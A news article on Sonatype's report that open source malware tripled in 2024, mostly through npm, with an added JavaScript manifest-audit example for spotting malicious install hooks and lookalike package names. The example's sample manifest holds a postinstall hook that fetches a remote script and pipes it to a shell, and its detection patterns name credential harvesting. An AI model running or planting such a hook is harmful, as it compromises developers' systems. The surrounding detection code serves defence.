Open source malware attacks triple in 2024

Malware is thriving in the open source ecosystem

[Image: Open source malware has proliferated rapidly this year]

New report uncovers just how much open-source malware has proliferated throughout the course of 2024

A report from software supply chain security platform Sonatype has revealed the extent to which open source malware has proliferated this year. Threat actors are using malicious open source packages to target developers as enterprises flock to open source to build custom AI models.

Traditional malware spreads via email attachments, malicious websites and similar channels, whereas open source malware disguises itself as a legitimate open source software (OSS) component so that developers pull it into the repositories, registries and build systems where code and other development assets are stored.

An example of this abuse is the Stargazers Ghost Network discovered by researchers this summer, which utilised GitHub’s reputation as a trusted tool to push out malware hidden in password-protected archives.

It’s intuitive that malware is thriving in an ecosystem with such low barriers to entry, high usage and widespread anonymity.

Popular open source code registry npm accounts for 98.5% of the malicious packages observed. The JavaScript ecosystem’s 70% growth in download requests, driven largely by AI and spam, combined with minimal verification of newly published packages, has made it a popular target for threat actors.
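Because nearly all of the observed packages come from npm, and install-time lifecycle scripts are the usual way malicious npm packages execute code before a single line of the library is ever imported, a practical pre-consumption gate starts with the package manifest. The following is an added example written for this article, not Sonatype’s product or any npm tooling: it parses a package.json, flags preinstall/install/postinstall hooks, matches their commands against a few risky command patterns, and checks the package name against a short allowlist of well-known names (the allowlist, the patterns and the sample manifest are all assumptions constructed for the example).

```javascript
// Added example for this article: a pre-install gate for npm manifests.
// Not Sonatype's code and not part of npm; the allowlist, regexes and the
// sample manifest below are constructed for illustration.

// Lifecycle hooks npm runs automatically when installing a registry tarball.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Command fragments that have no business in a library's install step.
const RISKY_PATTERNS = [
  { name: "remote-fetch", re: /\b(curl|wget)\b/ },
  { name: "eval-inline-js", re: /\bnode\s+-e\b|\beval\(/ },
  { name: "encoded-payload", re: /base64|Buffer\.from\([^)]*,\s*['"]hex['"]\)/ },
  { name: "env-harvest", re: /process\.env|\$\{?(HOME|AWS_|NPM_TOKEN)/ },
];

// Assumed allowlist of popular names for the lookalike heuristic; a real gate
// would use the organisation's own approved dependency list.
const KNOWN_PACKAGES = ["lodash", "express", "axios", "react", "chalk"];

// Levenshtein distance; a name one edit away from a known package is a signal.
function editDistance(a, b) {
  const dp = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) dp[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      dp[i][j] = Math.min(dp[i - 1][j] + 1, dp[i][j - 1] + 1, dp[i - 1][j - 1] + cost);
    }
  }
  return dp[a.length][b.length];
}

// Inspect a package.json string and return { name, decision, findings }.
function auditManifest(manifestJson) {
  const pkg = JSON.parse(manifestJson);
  const scripts = pkg.scripts || {};
  const findings = [];

  // 1. Any install-time hook is itself a finding: it runs with the developer's
  //    privileges during `npm install`. Risky fragments inside it are separate findings.
  for (const hook of INSTALL_HOOKS) {
    if (!(hook in scripts)) continue;
    const cmd = String(scripts[hook]);
    findings.push({ kind: "install-hook", detail: `${hook}: ${cmd}` });
    for (const p of RISKY_PATTERNS) {
      if (p.re.test(cmd)) findings.push({ kind: p.name, detail: `${hook}: ${cmd}` });
    }
  }

  // 2. Name that is one edit away from a well-known package (and is not that package).
  const name = String(pkg.name || "");
  for (const known of KNOWN_PACKAGES) {
    if (name !== known && editDistance(name, known) === 1) {
      findings.push({ kind: "lookalike-name", detail: `resembles ${known}` });
    }
  }

  // A bare hook goes to human review; anything beyond that is blocked outright.
  const severe = findings.some((f) => f.kind !== "install-hook");
  const decision = severe ? "block" : findings.length ? "review" : "allow";
  return { name, decision, findings };
}

// Constructed sample manifest (not a real package): lookalike name plus a
// postinstall hook that fetches and runs a remote script.
const SAMPLE_MANIFEST = JSON.stringify({
  name: "l0dash",
  version: "4.17.21",
  scripts: {
    postinstall: "node -e \"require('child_process').exec('curl -s https://example.invalid/x | sh')\"",
    test: "mocha",
  },
});

console.log(JSON.stringify(auditManifest(SAMPLE_MANIFEST), null, 2));
```

Run with `node audit.js`; the sample is blocked with four findings (the hook itself, the remote fetch, the inline `node -e`, and the lookalike name). Wiring this into CI before `npm install`, against the tarball’s own package.json rather than the registry metadata, is the point of Fox’s “before it enters their development pipelines”: the check runs before the hook ever has a chance to.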

The bulk of open source malware activity (64.75%) is in PUAs (Potentially Unwanted Applications). These can contain spyware, adware, or tracking components that compromise the security and privacy of end users. Other prevalent categories are security holding packages (24.2%), the placeholders npm publishes in place of packages it has removed for malicious content, and data exfiltration packages (7.86%).

Government organisations are by far the most likely to be targeted by threat actors using open source malware. Sonatype says 67% of the attacks it blocked in 2024 were aimed at government organisations, 24% at financial services companies, and 2% at organisations in the energy, oil & gas sector.

“Software developers have become the prime target for the next evolution of software supply chain attacks,” said Brian Fox, CTO and Co-Founder at Sonatype.

“Open source malware is uniquely nefarious — it sits between endpoint solutions, which can’t detect this method of delivery, and traditional vulnerability analysis. Too many enterprises treat open source malware like vulnerabilities in code, waiting to catch bugs during scanning, which is too late. It is imperative for organisations to take a proactive approach, preventing consumption of open source malware before it enters their development pipelines.”